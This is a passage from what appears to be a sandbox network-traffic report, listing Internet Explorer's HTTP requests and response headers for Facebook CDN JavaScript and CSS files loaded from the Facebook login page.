                                                  Accept: application/javascript, */*;q=0.8
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: application/x-javascript; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Fri, 27 Sep 2024 17:31:41 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: g2SM6Uf8LlK9MUKxGrvQPQ==
                                                  X-FB-Debug: /DCrbBKQifl84p0ozTR8hitghClgMPQQopzAmayD+AvSlIp246p7FjM8ltzX4IcpcHznL84CGCGkrO/x55IJ/Q==
                                                  Date: Sat, 07 Oct 2023 12:02:48 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 1210
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yb/r/TPdUEkA5C5u.js?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/yb/r/TPdUEkA5C5u.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: application/javascript, */*;q=0.8
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: application/x-javascript; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Fri, 04 Oct 2024 18:03:22 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: bFQKJfx05EZ4r58QzbO35g==
                                                  X-FB-Debug: DpEW3BA02vDBo7dRamZGaS73Q5Rr1yXNvC4tS0elihmBNnzkIX5vOwQLo4OrzWgbT5IaamlpKZDzIDWH0ZFy8w==
                                                  Date: Sat, 07 Oct 2023 12:02:48 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 8844
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/ym/r/R_qswDMOLWA.js?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/ym/r/R_qswDMOLWA.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: application/javascript, */*;q=0.8
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: application/x-javascript; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Sat, 28 Sep 2024 18:02:09 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: WMPydK4jXRSfSJB/gNuJHg==
                                                  X-FB-Debug: 5ogz4oa097EogyuPl+eKIH2BbaDrikWOR+enDfZZLtcY8DWbtKzaOcL8Z1jXN2HdEwbvFiiaKzJxPtHe5ulliw==
                                                  Date: Sat, 07 Oct 2023 12:02:48 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 3947
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yS/r/8Y1pHPyESqG.js?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/yS/r/8Y1pHPyESqG.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: application/javascript, */*;q=0.8
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: application/x-javascript; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Fri, 04 Oct 2024 18:03:22 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: hidUvhZNPQX6rwPbaP9+zQ==
                                                  X-FB-Debug: aK1WBAfoHg2a9aMP4xbkeAooAO2jaw4k082WoTuQQ6fYjS1CHBRJOB6sg+nQKQXEa/qMbArCwa4ZGaOjnxzJIA==
                                                  Date: Sat, 07 Oct 2023 12:02:48 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 58389
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yX/l/0,cross/srbvjPu5q9v.css?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/yX/l/0,cross/srbvjPu5q9v.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: text/css, */*
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: text/css; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Thu, 03 Oct 2024 19:20:08 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: /HWblO/2890yRe+9OFOSlQ==
                                                  X-FB-Debug: PNCIOM2G7bqyAU2UAQ7NQDGmsXvGqyFppMb5Ku9uE5XZP8do/FtOfUH84Lp2L4K7pHX4V2GDYy3PC7cPlR7tXA==
                                                  Date: Sat, 07 Oct 2023 12:02:46 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 1308
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yu/l/0,cross/wMWvCV-I6Hn.css?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/yu/l/0,cross/wMWvCV-I6Hn.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: text/css, */*
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: text/css; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Fri, 04 Oct 2024 19:24:30 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: KVGzbyUBBR6l76u8viaU/Q==
                                                  X-FB-Debug: ZcHxhlrscq9cDht9G/fMdz9dQL13qDFmdT8HegzBKBNYwPJ2Eaa1VQQLfn7EYCN8MdxgstwYpGiI9ZqmJaon/Q==
                                                  Date: Sat, 07 Oct 2023 12:02:46 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 3031
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yA/r/gYsh5OsZKde.js?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/yA/r/gYsh5OsZKde.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: application/javascript, */*;q=0.8
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: application/x-javascript; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Wed, 02 Oct 2024 06:06:16 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: v5PTR0r6A0MnlSpEe+3ShQ==
                                                  X-FB-Debug: LUVvFEIFyAYDqDzZArv2Ji4WIewriDji1emhs7e6C81SZNv94ghXVnXvkabABnJZ+i+reuCpSCu+c9DK7kvIeg==
                                                  Date: Sat, 07 Oct 2023 12:02:47 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 3555
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/ye/r/yUtEQ4ajXZI.js?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/ye/r/yUtEQ4ajXZI.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: application/javascript, */*;q=0.8
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: application/x-javascript; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Thu, 03 Oct 2024 18:51:11 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: WCUQJeRI9cPYgTinbDNMyA==
                                                  X-FB-Debug: xFTcjTf1P5qxY/iPb4KQ4cviNXQdZpdSSsbclKDF8YFZmtaEqxJhGoUGXrFW3Z2a29YMiw6U2/zwfsI85NIxZQ==
                                                  Date: Sat, 07 Oct 2023 12:02:48 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 845
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yF/r/gb_2sOlx922.js?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/yF/r/gb_2sOlx922.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: application/javascript, */*;q=0.8
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: application/x-javascript; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Fri, 04 Oct 2024 18:02:46 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: iiumhTuchGiaOohZ1sX5ng==
                                                  X-FB-Debug: ycegUAZWU+dly7mWzTrBWScR5l4mpVj6oh3QO4sMCEcC0SgfhCvP4kvFlsgunC0NLaOdp9XiW2s96hg29fNl7g==
                                                  Date: Sat, 07 Oct 2023 12:02:48 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 2515
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yJ/r/_i_bZ2JArcF.js?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/yJ/r/_i_bZ2JArcF.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: application/javascript, */*;q=0.8
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: application/x-javascript; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Fri, 04 Oct 2024 18:03:22 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: FtGA3BRVZDRoGV+sbC9TXw==
                                                  X-FB-Debug: MO2L3IdJLVLZSqTTG2GAAx14NPTdsw1nxXzTeW2oI1nSSmyQNYVv1gI3ucKW3Hlm3T0VEuJxrIvh65kYf7+c5A==
                                                  Date: Sat, 07 Oct 2023 12:02:48 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 2334
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yo/r/j5B70NmINXl.js?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/yo/r/j5B70NmINXl.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: application/javascript, */*;q=0.8
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: application/x-javascript; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Wed, 02 Oct 2024 06:06:16 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: QyIcWgTISJVkmoiPiRh4xA==
                                                  X-FB-Debug: SI4uo6MiGNKCueFlgjpB4nZdb2J+Q51y1SY0O6FIsNKjsMtEjZXniCZZs1WmBzF7W9JSF8+9J8S2KNV1314N1w==
                                                  Date: Sat, 07 Oct 2023 12:02:48 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 8495
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3iqES4/yQ/l/en_US/riV0sq4fGtL.js?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3iqES4/yQ/l/en_US/riV0sq4fGtL.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: application/javascript, */*;q=0.8
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: application/x-javascript; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Fri, 04 Oct 2024 23:49:16 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  x-fb-optimizer: 0
                                                  content-md5: 0UAQvXlRsQvG/APu1nqltw==
                                                  X-FB-Debug: A/0CoARQAZB0GSMaoMkmmh0zIPdeSW89tl8JX+S1QAJJ+BTRZ8gDK38H40IRpp36xuAU7UW1dQ1sJZ3s+HSA/w==
                                                  Date: Sat, 07 Oct 2023 12:02:48 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 14979
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/y9/l/0,cross/2W2z89vRC58.css?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/y9/l/0,cross/2W2z89vRC58.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: text/css, */*
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: text/css; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Sat, 05 Oct 2024 17:41:07 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: 5HHrVWw8oRgkBBacKgsdCw==
                                                  X-FB-Debug: jgZnKOtgTKqkCWekRWL6i8dTOyyefoxH97T8+ZeD+4VRr7alYjqbUQ2pEVuF2+ZcRiqNX+Q0WcfMoIGaIaagzw==
                                                  Date: Sat, 07 Oct 2023 12:02:46 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 1557
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yS/l/0,cross/WmItEcPXNHF.css?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/yS/l/0,cross/WmItEcPXNHF.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: text/css, */*
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: text/css; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Fri, 27 Sep 2024 19:43:15 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: IB0ZaqJVOMhgulk+zkLm2A==
                                                  X-FB-Debug: 9/YogmtKkkmDr3z3rpzOmzIcc0yn4ciZnJ/lDjU2TqR08j3Tw43gcPDjBHGSIYru6+7bTr1T1ZsmHXzIxovVig==
                                                  Date: Sat, 07 Oct 2023 12:02:46 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 3820
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/ys/r/_f5wO_K1viW.js?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/ys/r/_f5wO_K1viW.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: application/javascript, */*;q=0.8
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: application/x-javascript; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Wed, 02 Oct 2024 23:05:45 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  x-fb-optimizer: 0
                                                  content-md5: BPz/OR+hBJJ7/8t+ll6G3Q==
                                                  X-FB-Debug: V5lt+TwAKiVIaW2QQvUiEW82mC52uOekgmIzbkqFxOzz5/3ydIBKdX6PtjFRBfIKH43WbpBiUn9hdbQAcdJY6A==
                                                  Date: Sat, 07 Oct 2023 12:02:47 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 6858
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yt/r/d4QqVJOdC1V.js?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/yt/r/d4QqVJOdC1V.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: application/javascript, */*;q=0.8
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: application/x-javascript; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Fri, 04 Oct 2024 17:30:15 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
